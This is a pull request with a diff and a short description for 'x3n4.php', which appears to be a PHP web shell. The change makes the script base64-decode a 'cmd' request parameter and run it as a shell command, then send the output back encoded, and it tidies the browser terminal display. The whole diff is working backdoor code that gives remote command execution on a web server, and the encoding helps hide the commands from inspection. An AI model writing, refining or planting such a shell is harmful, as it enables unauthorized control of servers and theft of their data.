### PR TITLE
Missing encoding and some changes

### DIFF
--- a/x3n4.php
+++ b/x3n4.php
@@ -116,7 +116,7 @@ if (!empty($_SESSION['pwd'])) {
 }
 
 if (isset($_REQUEST['cmd'])) {
-    $REQUESTED_CMD = trim($_REQUEST['cmd']);
+    $REQUESTED_CMD = trim(base64_decode($_REQUEST['cmd']));
     if (empty($REQUESTED_CMD)) {
         exit(0);
     }
@@ -138,8 +138,8 @@ if (isset($_REQUEST['cmd'])) {
         session_destroy();
         exit(0);
     }
-    if (substr($_REQUEST['cmd'], 0, 3) === 'cd ') {
-        $dir = substr($_REQUEST['cmd'], 3);
+    if (substr($REQUESTED_CMD, 0, 3) === 'cd ') {
+        $dir = substr($REQUESTED_CMD, 3);
         $dir = realpath($dir);
         if (chdir($dir)) {
             $_SESSION['pwd'] = $dir;
@@ -147,7 +147,7 @@ if (isset($_REQUEST['cmd'])) {
         }
     }
 
-    $output = execute_command(base64_decode($_REQUEST['cmd']) . ' 2>&1');
+    $output = execute_command($REQUESTED_CMD . ' 2>&1');
     output_json(base64_encode($output));
 }
 
@@ -288,16 +288,10 @@ if (isset($_REQUEST['cmd'])) {
                     return;
                 }
                 command = Base64.encode(command);
+                $('#stdout').append($('#pwd').html() + " " + Base64.decode(command) + "\n");
                 $.post(this.script_path, {cmd: command}, function(data) {
-                    if (data.stdout) {
-                        $('#stdout').append(data.banner + " " + Base64.decode(command) + "\n");
-                        if (data.stdout !== null) {
-                            $('#stdout').append(Base64.decode(data.stdout));
-                        }
-                        $('#pwd').html(data.banner);
-                    } else {
-                        $('#stdout').append(data);
-                    }
+                    $('#stdout').append(Base64.decode(data.stdout));
+                    $('#pwd').html(data.banner);
                     $('#stdout').scrollTop($('#stdout')[0].scrollHeight);
                 });
             }


### PR DESCRIPTION
It was missing in the last PR add the encoding/decoding where sending ```upgrade``` or ```exit```.

Also I did a small change in order to display where we are after a `cd` command.

![x3n4_v0_1_6-alpha03](https://user-images.githubusercontent.com/337107/42126075-b47ec088-7c4f-11e8-804c-30e93363c9a1.png)
